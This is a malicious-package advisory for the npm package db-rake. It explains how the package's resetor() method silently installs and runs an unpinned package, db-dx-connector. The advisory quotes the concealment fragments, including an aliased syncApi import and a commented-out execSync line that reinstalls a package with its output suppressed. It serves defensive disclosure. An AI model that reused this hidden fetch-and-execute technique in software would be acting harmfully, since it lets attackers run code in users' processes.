OSV ID
MAL-2026-6540
Ecosystem
npm
Summary
When a consumer imports db-rake and constructs any Model, the package's resetor() method silently runs npm install db-dx-connector (unpinned, no-save: true , loglevel: silent , no-warnings: true ) via oubliette's syncApi , then require s the freshly-fetched module and invokes new DxDatabaseConnector({}).queryDBConnect() . The install primitive is concealed by aliasing the import as npm ( const { syncApi: npm } = require("oubliette") ) so call sites read as innocuous npm().install(...) , and all output is suppressed. The fetched package is attacker-mutable (latest tag), unrelated to the README's stated purpose (an in-memory mobx-backed database), and undocumented. A commented-out adjacent block in dist/index.js shows the same technique templated against a different target package ( clsx-js via execSync('npm uninstall clsx-js && npm install clsx-js', { stdio: 'ignore', windowsHide: true }) ), corroborating that the live db-dx-connector path is a deliberately engineered dropper rather than benign auto-recovery. Any code published to db-dx-connector at any future time will be executed in the consumer's process.
Source: amazon-inspector (d5a0d966d760dca0783a79eb150639ccfaf01aac944481e793dbcb7d7669983c)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.